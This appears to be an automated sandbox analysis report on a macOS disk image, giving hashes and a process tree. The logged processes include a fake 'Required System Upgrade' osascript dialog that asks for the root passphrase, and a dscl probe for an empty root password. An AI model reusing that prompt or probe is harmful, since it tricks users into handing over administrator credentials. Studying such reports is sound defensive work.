Analysis

  • max time kernel
    49s
  • max time network
    157s
  • platform
    macos-10.15_amd64
  • resource
    macos-20230831-en
  • resource tags

    arch:amd64, arch:i386, image:macos-20230831-en, kernel:19b77a, locale:en-us, os:macos-10.15-amd64, system
  • submitted
    04/10/2023, 18:06

General

  • Target

    8873ae9ef12bb5542d743116136e811789bbdc28b8cbc492cd55cba1b6e153ba_JC.dmg

  • Size

    500KB

  • MD5

    bd7939eb15ce394225c9095d5f25ab9c

  • SHA1

    5909d90239475d29d1045f38b98857b40a059d84

  • SHA256

    8873ae9ef12bb5542d743116136e811789bbdc28b8cbc492cd55cba1b6e153ba

  • SHA512

    3ec7f55414796615e2e1bcd8f26732439b5faddb29f79dd4acd7dab3bbf1df6be97a4859f12ace7c94f5fee918128f5500961a9470a51df57ffeacf9ffaaf439

  • SSDEEP

    12288:WXoJfAycbXpNU0bamorfNq4dYU1Uu65dRvwB1na+XyEfrWEN7wr:U9hbjtbrorFq0YUKLaXn3yhE

Score
1/10

Malware Config

Signatures

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"open /Volumes/source_folder/AppleApp.app\""
    1⤵
      PID:557
  • /bin/bash
    sh -c "sudo /bin/zsh -c \"open /Volumes/source_folder/AppleApp.app\""
    1⤵
      PID:557
  • /usr/bin/sudo
    sudo /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
    1⤵
      PID:557
    • /bin/zsh
      /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
      2⤵
        PID:558
    • /usr/bin/open
      open /Volumes/source_folder/AppleApp.app
      2⤵
        PID:558
  • /usr/libexec/xpcproxy
    xpcproxy com.apple.xpc.launchd.oneshot.0x10000002.AppleApp
    1⤵
      PID:559
  • /Volumes/source_folder/AppleApp.app/Contents/MacOS/AppleApp
    /Volumes/source_folder/AppleApp.app/Contents/MacOS/AppleApp -psn_0_167977
    1⤵
      PID:559
  • /usr/libexec/xpcproxy
    xpcproxy com.apple.bird
    1⤵
      PID:561
  • /System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
    /System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
    1⤵
      PID:561
  • /bin/sh
    sh -c "dscl . authonly \"root\" \"\""
    1⤵
      PID:563
  • /bin/bash
    sh -c "dscl . authonly \"root\" \"\""
    1⤵
      PID:563
  • /usr/bin/dscl
    dscl . authonly root
    1⤵
      PID:563
  • /bin/sh
    sh -c "osascript -e 'display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
    1⤵
      PID:564
  • /bin/bash
    sh -c "osascript -e 'display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
    1⤵
      PID:564
  • /usr/bin/osascript
    osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
    1⤵
      PID:564
  • /usr/libexec/xpcproxy
    xpcproxy com.apple.audio.systemsoundserverd
    1⤵
      PID:565
  • /usr/sbin/systemsoundserverd
    /usr/sbin/systemsoundserverd
    1⤵
      PID:565
  • /usr/libexec/xpcproxy
    xpcproxy com.apple.pbs
    1⤵
      PID:566
  • /System/Library/CoreServices/pbs
    /System/Library/CoreServices/pbs
    1⤵
      PID:566
  • /usr/libexec/xpcproxy
    xpcproxy com.apple.audio.AudioComponentRegistrar
    1⤵
      PID:567
  • /System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
    /System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
    1⤵
      PID:567

Network

MITRE ATT&CK Matrix


Downloads

  • /Users/run/Library/Caches/.dat.nosync0236.pVUPT6

    Filesize

    12KB

    MD5

    f720016d8bd8cc724ec2f4fd957b4a78

    SHA1

    3ef8da6731cc8225eb5bfa0ac1d59b17020119d6

    SHA256

    d932dfbbf853a70c6173a3d2392381eaa435671c6473c80d7f3f6dab3c50f301

    SHA512

    1a3e5728452afea9e510b771b60c3db127b34b372a4135820fff57b53e3341c8f79a355e221b9f5b933618fe28c2f187f509e40c8a1421d2e0cc1fff9d9f7cfc